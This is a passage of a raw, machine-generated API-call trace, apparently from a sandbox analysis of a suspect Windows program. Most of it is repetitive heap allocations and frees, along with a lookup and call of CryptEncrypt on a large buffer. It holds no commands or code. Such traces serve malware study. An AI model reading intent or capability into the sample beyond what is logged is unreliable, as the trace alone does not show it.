RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0141.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0141.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0141.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0141.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0141.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0141.293] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0141.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0141.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0141.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0141.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0141.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0141.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185aa) returned 0x2eb0ea0 [0141.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb0ea0 | out: hHeap=0x970000) returned 1 [0141.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0141.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0141.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0141.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0141.307] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0141.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0141.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0141.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0141.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0141.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0141.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0141.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b78 [0141.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0141.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.311] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0141.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54490 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0141.312] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x185aa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x185b0) returned 1 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0141.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0141.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0141.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0141.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0141.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0141.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0141.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0141.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 